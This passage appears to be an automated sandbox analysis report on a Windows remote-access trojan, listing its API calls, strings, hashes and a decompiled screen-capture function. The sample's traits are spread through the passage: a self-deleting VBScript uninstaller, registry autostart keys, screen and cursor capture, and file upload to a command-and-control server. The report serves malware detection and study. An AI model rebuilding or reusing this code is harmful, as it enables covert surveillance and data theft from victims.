                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 004083DA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                  • exit.MSVCRT ref: 004085A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 4026913539-546584676
                                  • Opcode ID: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                  • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                  • Opcode Fuzzy Hash: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                  • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FA46, Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 318windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				struct tagCURSORINFO _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96.cbSize = 0x14;
									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}







































                                  0x0040fa51
                                  0x0040fa62
                                  0x0040fa65
                                  0x0040fa6e
                                  0x0040fa7b
                                  0x0040fa89
                                  0x0040fa8c
                                  0x0040fa96
                                  0x0040fa99
                                  0x0040faac
                                  0x0040fab4
                                  0x0040fab7
                                  0x0040fae2
                                  0x0040fb08
                                  0x0040fb0b
                                  0x0040fb12
                                  0x0040fb40
                                  0x0040fb6d
                                  0x0040fb72
                                  0x0040fb82
                                  0x0040fbb0
                                  0x0040fbb5
                                  0x0040fbbf
                                  0x0040fbc5
                                  0x0040fbc5
                                  0x0040fb82
                                  0x0040fbca
                                  0x0040fbcd
                                  0x0040fbda
                                  0x0040fbfe
                                  0x0040fc02
                                  0x0040fc06
                                  0x0040fc12
                                  0x0040fc16
                                  0x0040fc22
                                  0x0040fc26
                                  0x00000000
                                  0x00000000
                                  0x0040fc2a
                                  0x0040fc2e
                                  0x00000000
                                  0x00000000
                                  0x0040fc33
                                  0x0040fcc4
                                  0x0040fccb
                                  0x0040fcd7
                                  0x0040fc3e
                                  0x0040fc46
                                  0x0040fc48
                                  0x0040fc4f
                                  0x0040fc58
                                  0x0040fc5e
                                  0x0040fc65
                                  0x0040fc6d
                                  0x0040fc71
                                  0x0040fc75
                                  0x0040fc78
                                  0x0040fc78
                                  0x0040fc83
                                  0x0040fc84
                                  0x0040fc8b
                                  0x0040fc8e
                                  0x0040fc94
                                  0x0040fc9a
                                  0x0040fc9d
                                  0x0040fca5
                                  0x0040fca8
                                  0x0040fcf4
                                  0x0040fd2b
                                  0x0040fd3c
                                  0x0040fd40
                                  0x0040fd48
                                  0x0040fd57
                                  0x0040fd5e
                                  0x0040fd6b
                                  0x0040fd7a
                                  0x0040fd87
                                  0x0040fd93
                                  0x0040fda0
                                  0x0040fdaf
                                  0x0040fdbc
                                  0x0040fdc5
                                  0x0040fdca
                                  0x0040fdd9
                                  0x0040fdde
                                  0x0040fde7
                                  0x0040fdf0
                                  0x0040fdf9
                                  0x00000000
                                  0x0040fdf9
                                  0x0040fcff
                                  0x0040fd04
                                  0x0040fd09
                                  0x0040fd0e
                                  0x0040fd14
                                  0x0040fcaa
                                  0x0040fcb3
                                  0x0040fcb8
                                  0x0040fcbd
                                  0x0040fcbf
                                  0x0040fcbf
                                  0x00000000
                                  0x0040fca8
                                  0x0040fc39
                                  0x0040fc3c
                                  0x00000000
                                  0x0040fc3c
                                  0x0040fc18
                                  0x0040fc18
                                  0x00000000
                                  0x0040fc18
                                  0x0040fc08
                                  0x00000000
                                  0x0040fbdc
                                  0x0040fbe5
                                  0x0040fbea
                                  0x0040fbef
                                  0x0040fbf1
                                  0x00000000
                                  0x0040fbf1
                                  0x0040fbda
                                  0x0040fb4b
                                  0x0040fb50
                                  0x0040fb55
                                  0x0040fb5b
                                  0x00000000
                                  0x0040fb5b
                                  0x0040faeb
                                  0x0040faf0
                                  0x0040faf5
                                  0x0040fafb
                                  0x00000000
                                  0x0040fafb
                                  0x0040fac0
                                  0x0040fac5
                                  0x0040fac8
                                  0x0040face
                                  0x00000000
                                  0x0040fa9f
                                  0x0040fa9f
                                  0x0040fd17
                                  0x0040fd20
                                  0x0040fdff
                                  0x0040fe06
                                  0x0040fe06

                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                  • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                  • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                  • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                  • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                  • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                  • GlobalFree.KERNEL32 ref: 0040FDCA
                                  • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                  • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@Compatible$BitmapFreeGlobalSelect
                                  • String ID: $BM$DISPLAY
                                  • API String ID: 1151051811-871886180
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403816, Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                  • String ID: Uploading file to C&C: $[INFO]
                                  • API String ID: 368904453-3151135581
                                  • Opcode ID: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                  • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                  • Opcode Fuzzy Hash: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                  • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004130BF, Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
